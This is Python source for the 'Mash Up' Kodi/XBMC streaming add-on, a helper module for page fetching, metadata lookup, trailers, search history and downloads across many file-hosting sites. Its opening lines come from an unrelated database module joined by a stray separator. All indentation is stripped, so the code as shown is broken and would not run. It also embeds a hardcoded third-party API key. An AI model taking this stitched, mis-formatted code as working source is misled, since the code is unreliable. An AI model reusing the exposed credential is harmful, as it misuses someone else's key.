cleanupQuery = QUERIES['CLEANUP OLD HAVE']
self._db.execute_write(cleanupQuery, (limit_ts,))
def insertOrUpdateHave(self, channel, infohash, peer_id, havemask, timestamp = None):
if timestamp is None:
timestamp = int(time.time())
if self.getHaveMask(channel, infohash, peer_id) is not None:
self.updateHaveMask(channel, infohash, peer_id, havemask, timestamp)
else:
self.insertHaveMask(channel, infohash, peer_id, havemask, timestamp)
|
import urllib,re,string,sys,os
import xbmc, xbmcgui, xbmcaddon, xbmcplugin
import time,threading
#Mash Up - by Mash2k3 2012.
addon_id = 'plugin.video.movie25'
selfAddon = xbmcaddon.Addon(id=addon_id)
mashpath = selfAddon.getAddonInfo('path')
grab = None
fav = False
hostlist = None
Dir = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.movie25', ''))
repopath = xbmc.translatePath(os.path.join('special://home/addons/repository.mash2k3', ''))
datapath = xbmc.translatePath(selfAddon.getAddonInfo('profile'))
supportsite = 'mashupxbmc.com'
hosts = 'putlocker,sockshare,billionuploads,hugefiles,mightyupload,movreel,lemuploads,180upload,megarelease,filenuke,flashx,gorillavid,bayfiles,veehd,vidto,mailru,videomega,epicshare,bayfiles,2gbhosting,alldebrid,allmyvideos,vidspot,castamp,cheesestream,clicktoview,crunchyroll,cyberlocker,daclips,dailymotion,divxstage,donevideo,ecostream,entroupload,facebook,filebox,hostingbulk,hostingcup,jumbofiles,limevideo,movdivx,movpod,movshare,movzap,muchshare,nolimitvideo,nosvideo,novamov,nowvideo,ovfile,play44_net,played,playwire,premiumize_me,primeshare,promptfile,purevid,rapidvideo,realdebrid,rpnet,seeon,sharefiles,sharerepo,sharesix,skyload,stagevu,stream2k,streamcloud,thefile,tubeplus,tunepk,ufliq,upbulk,uploadc,uploadcrazynet,veoh,vidbull,vidcrazynet,video44,videobb,videofun,videotanker,videoweed,videozed,videozer,vidhog,vidpe,vidplay,vidstream,vidup,vidx,vidxden,vidzur,vimeo,vureel,watchfreeinhd,xvidstage,yourupload,youtube,youwatch,zalaa,zooupload,zshare'
if selfAddon.getSetting('visitor_ga')=='':
from random import randint
selfAddon.setSetting('visitor_ga',str(randint(0, 0x7fffffff)))
VERSION = str(selfAddon.getAddonInfo('version'))
#PATH = "MashUp-DEV"
PATH = "MashUp-"
UATRACK="UA-38312513-1"
try:
log_path = xbmc.translatePath('special://logpath')
log = os.path.join(log_path, 'xbmc.log')
logfile = open(log, 'r').read()
match=re.compile('Starting XBMC \((.+?) Git:.+?Platform: (.+?)\. Built').search(logfile)
if not match:
match=re.compile('Starting XBMC \((.+?) Git:.+?Platform: (.+?bit)').search(logfile)
if match:
build = match.group(1)
PLATFORM = match.group(2)
print 'XBMC '+build+' Platform '+PLATFORM
else:
PLATFORM=''
except:
PLATFORM=''
sys.path.append( os.path.join( selfAddon.getAddonInfo('path'), 'resources', 'libs' ))
################################################################################ Common Calls ##########################################################################################################
if selfAddon.getSetting("skin") == "0":
art = 'https://raw.github.com/mash2k3/MashupArtwork/master/skins/vector'
fanartimage=Dir+'fanart2.jpg'
else:
art = 'https://raw.github.com/mash2k3/MashupArtwork/master/skins/greenmonster'
fanartimage=Dir+'fanart.jpg'
elogo = xbmc.translatePath('special://home/addons/plugin.video.movie25/resources/art/bigx.png')
slogo = xbmc.translatePath('special://home/addons/plugin.video.movie25/resources/art/smallicon.png')
def OPENURL(url, mobile = False, q = False, verbose = True, timeout = 10, cookie = None, data = None, cookiejar = False, log = True, headers = [], type = '',ua = False):
import urllib2
UserAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36'
if ua: UserAgent = ua
try:
if log:
print "MU-Openurl = " + url
if cookie and not cookiejar:
import cookielib
cookie_file = os.path.join(os.path.join(datapath,'Cookies'), cookie+'.cookies')
cj = cookielib.LWPCookieJar()
if os.path.exists(cookie_file):
try: cj.load(cookie_file,True)
except: cj.save(cookie_file,True)
else: cj.save(cookie_file,True)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
elif cookiejar:
import cookielib
cj = cookielib.LWPCookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
else:
opener = urllib2.build_opener()
if mobile:
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')]
else:
opener.addheaders = [('User-Agent', UserAgent)]
for header in headers:
opener.addheaders.append(header)
if data:
if type == 'json':
import json
data = json.dumps(data)
opener.addheaders.append(('Content-Type', 'application/json'))
else: data = urllib.urlencode(data)
response = opener.open(url, data, timeout)
else:
response = opener.open(url, timeout=timeout)
if cookie and not cookiejar:
cj.save(cookie_file,True)
link=response.read()
response.close()
opener.close()
#link = net(UserAgent).http_GET(url).content
        # Decode common HTML entities and strip leftover markup from the page source
        link=link.replace('&#039;',"'").replace('&quot;','"').replace('&amp;',"&").replace("&#39;","'").replace('<i>','').replace("#8211;","-").replace('</i>','').replace('&#8217;',"'").replace('&amp;quot;','"').replace('&#215;','x').replace('&amp;','&').replace('&#8216;','').replace('&#8211;','').replace('&#8220;','').replace('&#8221;','').replace('&#8212;','')
        link=link.replace('%3A',':').replace('%2F','/')
if q: q.put(link)
return link
except Exception as e:
if verbose:
xbmc.executebuiltin("XBMC.Notification(Sorry!,Source Website is Down,3000,"+elogo+")")
xbmc.log('***********Website Error: '+str(e)+'**************', xbmc.LOGERROR)
import traceback
traceback.print_exc()
link ='website down'
if q: q.put(link)
return link
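# Usage sketch (hypothetical URL): fetch a page, reusing a named cookie jar stored
# under the addon data path; callers check for the 'website down' sentinel on failure.
#   html = OPENURL('http://example.com/page', cookie='examplesite', timeout=15)
#   if html == 'website down':
#       pass  # handle the failure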
def batchOPENURL(urls, mobile = False, merge = True):
try:
import Queue as queue
except ImportError:
import queue
max = len(urls)
results = []
for url in urls:
q = queue.Queue()
threading.Thread(target=OPENURL, args=(url,mobile,q)).start()
results.append(q)
if merge: content = ''
else: content = []
for n in range(max):
if merge: content += results[n].get()
else: content.append(results[n].get())
return content
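# Sketch (hypothetical URLs): fetch several pages concurrently and keep the
# results separate instead of concatenating them.
#   pages = batchOPENURL(['http://example.com/a', 'http://example.com/b'], merge=False)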
def OPENURL2(url):
from t0mm0.common.net import Net as net
UserAgent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
try:
print "MU-Openurl = " + url
link = net(UserAgent).http_GET(url).content
return link.encode('utf-8', 'ignore')
except:
xbmc.executebuiltin("XBMC.Notification(Sorry!,Source Website is Down,3000,"+elogo+")")
link ='website down'
return link
def REDIRECT(url):
import urllib2
req = urllib2.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')
response = urllib2.urlopen(req)
link=response.geturl()
return link
def Clearhistory(path):
if os.path.exists(path):
os.remove(path)
def setGrab():
global grab
if grab is None:
from metahandler import metahandlers
grab = metahandlers.MetaData()
def getFav():
global fav
if not fav:
from resources.universal import favorites
fav = favorites.Favorites(addon_id, sys.argv)
return fav
def getRDHosts():
CachePath = os.path.join(datapath,'Cache')
CachedRDHosts = xbmc.translatePath(os.path.join(CachePath, 'rdhosts'))
rdhosts = getFile(CachedRDHosts)
if not rdhosts or os.stat(CachedRDHosts).st_mtime + 86400 < time.time():
rdhosts = OPENURL('http://real-debrid.com/api/hosters.php').replace('"', '')
setFile(CachedRDHosts,rdhosts,True)
return rdhosts
def getHostList():
global hostlist
if not hostlist:
hostlist = hosts
try:
if xbmcaddon.Addon(id='script.module.urlresolver').getSetting("RealDebridResolver_enabled") == 'true': hostlist += getRDHosts()
except: pass
return hostlist
def unescapes(text):
try:
rep = {"%26":"&","&":"&","&":"&",",": ","," ": " ","\n": "","\t": "","\r": "","%5B": "[","%5D": "]",
"%3a": ":","%3A":":","%2f":"/","%2F":"/","%3f":"?","%3F":"?","%3d":"=","%3D":"=","%2C":",","%2c":",","%3C":"<",
"%20":" ","%22":'"',"%3D":"=","%3A":":","%2F":"/","%3E":">","%3B":",","%27":"'","%0D":"","%0A":"","%92":"'",
"<": "<",">": ">",""": '"',"’": "'","´": "'"}
for s, r in rep.items():
text = text.replace(s, r)
text = re.sub(r"<!--.+?-->", "", text)
except TypeError: pass
return text
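# Example (sketch, using the entity map above):
#   unescapes('Movie%20Title %26 More &amp; &quot;quotes&quot;')
#   -> 'Movie Title & More & "quotes"'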
def removeColorTags(text):
return re.sub('\[COLOR[^\]]{,15}\]','',text.replace("[/COLOR]", ""),re.I|re.DOTALL).strip()
def removeColoredText(text):
return re.sub('\[COLOR.*?\[/COLOR\]','',text,re.I|re.DOTALL).strip()
def SwitchUp():
if selfAddon.getSetting("switchup") == "false":
selfAddon.setSetting(id="switchup", value="true")
else:
selfAddon.setSetting(id="switchup", value="false")
xbmc.executebuiltin("XBMC.Container.Refresh")
def ErrorReport(e):
elogo = xbmc.translatePath('special://home/addons/plugin.video.movie25/resources/art/bigx.png')
xbmc.executebuiltin("XBMC.Notification([COLOR=FF67cc33]Mash Up Error[/COLOR],"+str(e)+",10000,"+elogo+")")
xbmc.log('***********Mash Up Error: '+str(e)+'**************', xbmc.LOGERROR)
def CloseAllDialogs():
xbmc.executebuiltin("XBMC.Dialog.Close(all,true)")
def ClearDir(dir, clearNested = False):
for the_file in os.listdir(dir):
file_path = os.path.join(dir, the_file)
if clearNested and os.path.isdir(file_path):
ClearDir(file_path, clearNested)
try: os.rmdir(file_path)
except Exception, e: print str(e)
else:
try:os.unlink(file_path)
except Exception, e: print str(e)
def CleanTitle(mname):
title = mname.strip()
quality = re.search('(?i)(1080p?)',mname)
if not quality: quality = re.search('(?i)(720p?)',mname)
if not quality: quality = re.search('(?i)(480p?)',mname)
if quality:
quality = quality.group(1).lower()
if not re.search('p$',quality): quality += 'p'
else:
tag = re.search('(?i)(dvdrip|pdtv|xvid|bluray|hdtv|\scam(?![a-z])|r6|r5|\sts|webrip|bdrip|brrip)',mname)
if tag:
quality = tag.group(1).strip()
else: quality = ''
epi = re.search('(?i)s(\d+)e(\d+?)',mname)
if epi:
title = re.findall('(?i)(.+?s\d+e\d+)',mname)[0].strip()
if quality:
title = title + ' [COLOR red]' + quality + '[/COLOR]'
else:
movie = re.search('(?i)(.+?\s\d{4})',mname.replace('(','').replace(')',''))
if movie:
title = movie.group(1).strip() + ' [COLOR red]' + quality + '[/COLOR]'
return title
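# Example (sketch): CleanTitle('Some Movie 2012 720p BluRay x264')
# -> 'Some Movie 2012 [COLOR red]720p[/COLOR]'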
def removeFile(file):
try:
if os.path.exists(file): os.remove(file)
return True
except: return False
def getFileName(file):
return re.sub('.*?([\w-]+)\.[^\.]+$','\\1',file)
def getFile(path):
content = None
if os.path.exists(path):
try: content = open(path).read()
except: pass
return content
def setFile(path,content,force=False):
if os.path.exists(path) and not force:
return False
else:
try:
open(path,'w+').write(content)
return True
except: pass
return False
def downloadFile(url,dest,silent = False,cookie = None):
try:
import urllib2
file_name = url.split('/')[-1]
print "Downloading: %s" % (file_name)
if cookie:
import cookielib
cookie_file = os.path.join(os.path.join(datapath,'Cookies'), cookie+'.cookies')
cj = cookielib.LWPCookieJar()
if os.path.exists(cookie_file):
try: cj.load(cookie_file,True)
except: cj.save(cookie_file,True)
else: cj.save(cookie_file,True)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
else:
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')]
u = opener.open(url)
f = open(dest, 'wb')
meta = u.info()
if meta.getheaders("Content-Length"):
file_size = int(meta.getheaders("Content-Length")[0])
else: file_size = 'Unknown'
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer: break
file_size_dl += len(buffer)
f.write(buffer)
# status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
# status = status + chr(8)*(len(status)+1)
# print status,
print "Downloaded: %s %s Bytes" % (file_name, file_size)
f.close()
return True
except Exception, e:
print 'Error downloading file ' + url.split('/')[-1]
ErrorReport(e)
if not silent:
dialog = xbmcgui.Dialog()
dialog.ok("Mash Up", "Report the error below at " + supportsite, str(e), "We will try our best to help you")
return False
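# Note: updateSearchFile below keeps a simple flat-file search history (SearchHistoryTv for
# TV, SearchHistory25 for movies) under <datapath>/Search, storing each query as a
# 'search="<query>",' entry, de-duplicating the current query and dropping the oldest entry
# once the history reaches ten items.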
def updateSearchFile(searchQuery,searchType,defaultValue = '###',searchMsg = ''):
addToSearchHistory = True
searchpath=os.path.join(datapath,'Search')
if searchType == "TV":
searchHistoryFile = "SearchHistoryTv"
if not searchMsg: searchMsg = 'Search For TV Shows'
else:
searchHistoryFile = "SearchHistory25"
if not searchMsg: searchMsg = 'Search For Movies'
SearchFile=os.path.join(searchpath,searchHistoryFile)
searchQuery=urllib.unquote(searchQuery)
if not searchQuery or searchQuery == defaultValue:
searchQuery = ''
try: os.makedirs(searchpath)
except: pass
keyb = xbmc.Keyboard('', searchMsg )
keyb.doModal()
if (keyb.isConfirmed()):
searchQuery = keyb.getText()
else:
xbmcplugin.endOfDirectory(int(sys.argv[1]),False,False)
return False
else:
addToSearchHistory = False
searchQuery=urllib.quote(searchQuery)
if os.path.exists(SearchFile):
searchitems=re.compile('search="([^"]+?)",').findall(open(SearchFile,'r').read())
if searchitems.count(searchQuery) > 0: addToSearchHistory = True
if addToSearchHistory:
if not os.path.exists(SearchFile) and searchQuery != '':
open(SearchFile,'w').write('search="%s",'%searchQuery)
elif searchQuery != '':
open(SearchFile,'a').write('search="%s",'%searchQuery)
else: return False
searchitems=re.compile('search="([^"]+?)",').findall(open(SearchFile,'r').read())
rewriteSearchFile = False
if searchitems.count(searchQuery) > 1:
searchitems.remove(searchQuery)
rewriteSearchFile = True
if len(searchitems)>=10:
searchitems.remove(searchitems[0])
rewriteSearchFile = True
if rewriteSearchFile:
os.remove(SearchFile)
for searchitem in searchitems:
try: open(SearchFile,'a').write('search="%s",'%searchitem)
except: pass
return searchQuery
def supportedHost(host):
if 'ul' == host: host = 'uploaded'
return host.lower() in getHostList()
################################################################################ Notifications #########################################################################################################
def CheckVersion():
try:
link=OPENURL('http://repo.mashupxbmc.com/plugin.video.movie25/resources/libs/main.py',verbose=False)
except:
link='nill'
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('VERSION = "(.+?)"').findall(link)
if len(match)>0:
if VERSION != str(match[0]):
dialog = xbmcgui.Dialog()
            ok=dialog.ok('[B]New Update Available![/B]', "Your version of Mash Up is outdated.", 'The current available version is '+str(match[0]),'To update go to Add-ons under System settings')
print 'Mash Up v'+VERSION+' is Outdated'
return False
else:
print 'Mash Up v'+VERSION+' is Up to Date'
return True
else:
print 'CloudFlare Link Down'
return False
######################################################################## Live Stream do Regex ############################################################
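# doRegex expects murl to be a plain URL followed by one or more <regex> descriptors of the
# form <name>k</name><expres>pattern</expres><page>url</page><referer>url</referer></regex>.
# Each $doregex[k] placeholder in the URL part is replaced with the first match of 'pattern'
# against the fetched <page> (requested with the given referer, or the page URL itself when
# the referer field is empty).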
def doRegex(murl):
#rname=rname.replace('><','').replace('>','').replace('<','')
import urllib2
url=re.compile('([^<]+)<regex>',re.DOTALL).findall(murl)[0]
doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
for k in doRegexs:
if k in murl:
regex=re.compile('<name>'+k+'</name><expres>(.+?)</expres><page>(.+?)</page><referer>(.+?)</referer></regex>',re.DOTALL).search(murl)
referer=regex.group(3)
if referer=='':
referer=regex.group(2)
req = urllib2.Request(regex.group(2))
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:10.0a1) Gecko/20111029 Firefox/10.0a1')
req.add_header('Referer',referer)
response = urllib2.urlopen(req)
link=response.read()
response.close()
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','').replace('\/','/')
r=re.compile(regex.group(1),re.DOTALL).findall(link)[0]
url = url.replace("$doregex[" + k + "]", r)
return url
################################################################################ AutoView ##########################################################################################################
def VIEWS():
if selfAddon.getSetting("auto-view") == "true":
if selfAddon.getSetting("choose-skin") == "true":
if selfAddon.getSetting("con-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("con-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(51)")
elif selfAddon.getSetting("con-view") == "2":
xbmc.executebuiltin("Container.SetViewMode(500)")
elif selfAddon.getSetting("con-view") == "3":
xbmc.executebuiltin("Container.SetViewMode(501)")
elif selfAddon.getSetting("con-view") == "4":
xbmc.executebuiltin("Container.SetViewMode(508)")
elif selfAddon.getSetting("con-view") == "5":
xbmc.executebuiltin("Container.SetViewMode(504)")
elif selfAddon.getSetting("con-view") == "6":
xbmc.executebuiltin("Container.SetViewMode(503)")
elif selfAddon.getSetting("con-view") == "7":
xbmc.executebuiltin("Container.SetViewMode(515)")
return
elif selfAddon.getSetting("choose-skin") == "false":
if selfAddon.getSetting("xpr-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("xpr-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(52)")
elif selfAddon.getSetting("xpr-view") == "2":
xbmc.executebuiltin("Container.SetViewMode(501)")
elif selfAddon.getSetting("xpr-view") == "3":
xbmc.executebuiltin("Container.SetViewMode(55)")
elif selfAddon.getSetting("xpr-view") == "4":
xbmc.executebuiltin("Container.SetViewMode(54)")
elif selfAddon.getSetting("xpr-view") == "5":
xbmc.executebuiltin("Container.SetViewMode(60)")
elif selfAddon.getSetting("xpr-view") == "6":
xbmc.executebuiltin("Container.SetViewMode(53)")
return
else:
return
def VIEWSB():
if selfAddon.getSetting("auto-view") == "true":
if selfAddon.getSetting("home-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("home-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(500)")
return
def VIEWSB2():
if selfAddon.getSetting("auto-view") == "true":
if selfAddon.getSetting("sub-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("sub-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(500)")
return
################################################################################ Movies Metahandler ##########################################################################################################
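# GETMETAT/GETMETAEpiT below normalise the raw listing title (stripping colour tags, quality
# and release markers) before querying the metahandlers 'grab' object, and fall back to the
# thumb/fanart/plot passed in by the caller when metadata is disabled or no match is found.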
def formatCast(cast):
roles = "\n\n"
for role in cast:
roles = roles + "[COLOR blue]" + role[0] + "[/COLOR] as " + role[1] + " | "
return roles
def GETMETAT(mname,genre,fan,thumb,plot='',imdb='',tmdb=''):
originalName=mname
if selfAddon.getSetting("meta-view") == "true":
setGrab()
mname = re.sub(r'\[COLOR red\]\(?(\d{4})\)?\[/COLOR\]',r'\1',mname)
mname = removeColoredText(mname)
mname = mname.replace(' EXTENDED and UNRATED','').replace('Webrip','').replace('MaxPowers','').replace('720p','').replace('1080p','').replace('TS','').replace('HD','').replace('R6','').replace('H.M.','').replace('HackerMil','').replace('(','').replace(')','').replace('[','').replace(']','')
mname = mname.replace(' Extended Cut','').replace('Awards Screener','')
mname = re.sub('Cam(?![A-Za-z])','',mname)
mname = re.sub('(?i)3-?d h-?sbs','',mname)
mname = mname.strip()
if re.findall('\s\d{4}',mname):
            r = re.split(r'\s\d{4}', mname)
name = r[0]
year = re.findall('\s(\d{4})\s',mname + " ")
if year: year = year[0]
else: year=''
else:
name=mname
year=''
name = name.decode("ascii", "ignore")
meta = grab.get_meta('movie',name,imdb,tmdb,year)# first is Type/movie or tvshow, name of show,tvdb id,imdb id,string of year,unwatched = 6/watched = 7
if not meta['year']:
name = re.sub(':.*','',name)
meta = grab.get_meta('movie',name,imdb,tmdb,year)
print "Movie mode: %s"%name
infoLabels = {'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],
'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'overlay':meta['overlay'],
'director': meta['director'],'cast': meta['cast'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year'],
'imdb_id' : meta['imdb_id']}
if infoLabels['genre']=='':
infoLabels['genre']=genre
if infoLabels['cover_url']=='':
infoLabels['cover_url']=thumb
if infoLabels['backdrop_url']=='':
            if fan=='': fan=fanartimage
            infoLabels['backdrop_url']=fan
if meta['overlay'] == 7: infoLabels['playcount'] = 1
else: infoLabels['playcount'] = 0
if infoLabels['cover_url']=='':
thumb=art+'/vidicon.png'
infoLabels['cover_url']=thumb
#if int(year+'0'):
# infoLabels['year']=year
infoLabels['metaName']=infoLabels['title']
infoLabels['title']=originalName
if infoLabels['plot']=='': infoLabels['plot']=plot
else: infoLabels['plot'] = infoLabels['plot'] + formatCast(infoLabels['cast'])
else:
if thumb=='': thumb=art+'/vidicon.png'
        if fan=='': fan=fanartimage
infoLabels = {'title': mname,'metaName': mname,'cover_url': thumb,'backdrop_url': fan,'season': '','episode': '','year': '','plot': '','genre': genre,'imdb_id': '','tmdb_id':''}
return infoLabels
################################################################################ TV Shows Metahandler ##########################################################################################################
def GETMETAEpiT(mname,thumb,desc):
originalName=mname
mname = removeColoredText(mname)
if selfAddon.getSetting("meta-view-tv") == "true":
setGrab()
mname = mname.replace('New Episode','').replace('Main Event','').replace('New Episodes','')
mname = mname.strip()
r = re.findall('(.+?)\ss(\d+)e(\d+)\s',mname + " ",re.I)
if not r: r = re.findall('(.+?)\sseason\s(\d+)\sepisode\s(\d+)\s',mname + " ",re.I)
if not r: r = re.findall('(.+?)\s(\d+)x(\d+)\s',mname + " ",re.I)
if r:
for name,sea,epi in r:
year=''
name=name.replace(' US','').replace(' (US)','').replace(' (us)','').replace(' (uk Series)','').replace(' (UK)','').replace(' UK',' (UK)').replace(' AU','').replace(' AND',' &').replace(' And',' &').replace(' and',' &').replace(' 2013','').replace(' 2011','').replace(' 2012','').replace(' 2010','')
if re.findall('twisted',name,re.I):
year='2013'
if re.findall('the newsroom',name,re.I):
year='2012'
metaq = grab.get_meta('tvshow',name,None,None,year)
imdb=metaq['imdb_id']
tit=metaq['title']
year=metaq['year']
epiname=''
else:
metaq=''
name=mname
epiname=''
sea=0
epi=0
imdb=''
tit=''
year=''
meta = grab.get_episode_meta(str(name),imdb, int(sea), int(epi))
print "Episode Mode: Name %s Season %s - Episode %s"%(str(name),str(sea),str(epi))
infoLabels = {'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'premiered':meta['premiered'],
'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'overlay':meta['overlay'],'episode': meta['episode'],
'season': meta['season'],'backdrop_url': meta['backdrop_url']}
if infoLabels['cover_url']=='':
if metaq!='':
thumb=metaq['cover_url']
infoLabels['cover_url']=thumb
if infoLabels['backdrop_url']=='':
fan=fanartimage
infoLabels['backdrop_url']=fan
if infoLabels['cover_url']=='':
if thumb=='':
thumb=art+'/vidicon.png'
infoLabels['cover_url']=thumb
else:
infoLabels['cover_url']=thumb
infoLabels['imdb_id']=imdb
if meta['overlay'] == 7:
infoLabels['playcount'] = 1
else:
infoLabels['playcount'] = 0
infoLabels['showtitle']=tit
infoLabels['year']=year
infoLabels['metaName']=infoLabels['title']
infoLabels['title']=originalName
else:
fan=fanartimage
infoLabels = {'title': originalName,'metaName': mname,'cover_url': thumb,'backdrop_url': fan,'season': '','episode': '','year': '','plot': desc,'genre': '','imdb_id': ''}
return infoLabels
############################################################################### Playback resume/ mark as watched #################################################################################
def WatchedCallback():
    xbmc.log('%s: %s' % (selfAddon.getAddonInfo('name'), 'Video completely watched.'), xbmc.LOGNOTICE)
videotype='movies'
setGrab()
grab.change_watched(videotype, name, iconimage, season='', episode='', year='', watched=7)
xbmc.executebuiltin("XBMC.Container.Refresh")
def WatchedCallbackwithParams(video_type, title, imdb_id, season, episode, year):
print "worked"
setGrab()
grab.change_watched(video_type, title, imdb_id, season=season, episode=episode, year=year, watched=7)
xbmc.executebuiltin("XBMC.Container.Refresh")
def ChangeWatched(imdb_id, videoType, name, season, episode, year='', watched='', refresh=False):
setGrab()
grab.change_watched(videoType, name, imdb_id, season=season, episode=episode, year=year, watched=watched)
xbmc.executebuiltin("XBMC.Container.Refresh")
def refresh_movie(vidtitle,imdb, year=''):
#global metaget
#if not metaget:
# metaget=metahandlers.MetaData()
vidtitle = vidtitle.decode("ascii", "ignore")
if re.search("^\d+", vidtitle):
m = re.search('^(\d+)(.*)', vidtitle)
vidtitle = m.group(1) + m.group(2)
else: vidtitle = re.sub("\d+", "", vidtitle)
vidtitle=vidtitle.replace(' ','')
setGrab()
search_meta = grab.search_movies(vidtitle)
if search_meta:
movie_list = []
for movie in search_meta:
movie_list.append(movie['title'] + ' (' + str(movie['year']) + ')')
dialog = xbmcgui.Dialog()
index = dialog.select('Choose', movie_list)
if index > -1:
new_imdb_id = search_meta[index]['imdb_id']
new_tmdb_id = search_meta[index]['tmdb_id']
year=search_meta[index]['year']
meta=grab.update_meta('movie', vidtitle, imdb, '',new_imdb_id,new_tmdb_id,year)
xbmc.executebuiltin("Container.Refresh")
else:
xbmcgui.Dialog().ok('Refresh Results','No matches found')
def episode_refresh(vidname, imdb, season_num, episode_num):
setGrab()
grab.update_episode_meta(vidname, imdb, season_num, episode_num)
xbmc.executebuiltin("XBMC.Container.Refresh")
################################################################################Trailers#######################################################################
def trailer(tmdbid):
if tmdbid == '':
xbmc.executebuiltin("XBMC.Notification(Sorry!,No Trailer Available For This Movie,3000)")
else:
import urllib2
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Loading Trailer,1500)")
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:10.0a1) Gecko/20111029 Firefox/10.0a1'
request= 'http://api.themoviedb.org/3/movie/' + tmdbid + '/trailers?api_key=d5da2b7895972fffa2774ff23f40a92f'
txheaders= {'Accept': 'application/json','User-Agent':user_agent}
req = urllib2.Request(request,None,txheaders)
response=urllib2.urlopen(req).read()
if re.search('"size":"HD"',response):
quality=re.compile('"size":"HD","source":"(.+?)"').findall(response)[0]
youtube='http://www.youtube.com/watch?v=' + quality
stream_url= "plugin://plugin.video.youtube/?path=/root/video&action=play_video&videoid="+quality+"&hd=1"
xbmc.Player().play(stream_url)
elif re.search('"size":"HQ"',response):
quality=re.compile('"size":"HQ","source":"(.+?)"').findall(response)[0]
youtube='http://www.youtube.com/watch?v=' + quality
stream_url= "plugin://plugin.video.youtube/?path=/root/video&action=play_video&videoid="+quality+"&hd=1"
xbmc.Player().play(stream_url)
elif re.search('"size":"Standard"',response):
quality=re.compile('"size":"Standard","source":"(.+?)"').findall(response)[0]
youtube='http://www.youtube.com/watch?v=' + quality
stream_url= "plugin://plugin.video.youtube/?path=/root/video&action=play_video&videoid="+quality+"&hd=1"
xbmc.Player().play(stream_url)
else:
xbmc.executebuiltin("XBMC.Notification(Sorry!,No Trailer Available For This Movie,3000)")
def TRAILERSEARCH(url, name, imdb):
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Getting Trailers Result,2000)")
name = re.split(':\s\[',name)
search = name[0]
setGrab()
infoLabels = grab._cache_lookup_by_name('movie', search.strip(), year='')
print infoLabels
res_name = []
res_url = []
res_name.append('[COLOR red][B]Cancel[/B][/COLOR]')
site = ' site:http://www.youtube.com '
results = SearchGoogle(search+' official trailer', site)
for res in results:
if res.url.encode('utf8').startswith('http://www.youtube.com/watch'):
res_name.append(res.title.encode('utf8'))
res_url.append(res.url.encode('utf8'))
results = SearchGoogle(search[:(len(search)-7)]+' official trailer', site)
for res in results:
if res.url.encode('utf8').startswith('http://www.youtube.com/watch') and res.url.encode('utf8') not in res_url:
res_name.append(res.title.encode('utf8'))
res_url.append(res.url.encode('utf8'))
dialog = xbmcgui.Dialog()
ret = dialog.select(search + ' trailer search',res_name)
if ret == 0:
return
elif ret >= 1:
        trailer_url = res_url[ret - 1]
try:
xbmc.executebuiltin(
"PlayMedia(plugin://plugin.video.youtube/?action=play_video&videoid=%s)"
% str(trailer_url)[str(trailer_url).rfind("v=")+2:] )
if re.findall('Darwin iOS',PLATFORM):
grab.update_trailer('movie', imdb, trailer_url)
xbmc.executebuiltin("XBMC.Container.Refresh")
except:
return
def SearchGoogle(search, site):
from xgoogle.search import GoogleSearch
gs = GoogleSearch(''+search+' '+site)
gs.results_per_page = 25
gs.page = 0
try:
results = gs.get_results()
except Exception, e:
print '***** Error: %s' % e
return None
return results
############################################################################### Resolvers ############################################################################################
def resolve_url(url,filename = False):
import resolvers
return resolvers.resolve_url(url,filename)
############################################################################### Download Code ###########################################################################################
downloadPath = selfAddon.getSetting('download-folder')
DownloadLog=os.path.join(datapath,'Downloads')
try:
os.makedirs(DownloadLog)
except:
pass
DownloadFile=os.path.join(DownloadLog,'DownloadLog')
class StopDownloading(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def GetUrliW(url):
link=OPENURL(url)
link=unescapes(link)
match=re.compile('<(?:iframe|pagespeed_iframe).+?src=\"(.+?)\"').findall(link)
link=match[0]
return link
def geturl(murl):
link=OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','')
match=re.compile('<a class="myButton" href="(.+?)">Click Here to Play</a>').findall(link)
if len(match)==0:
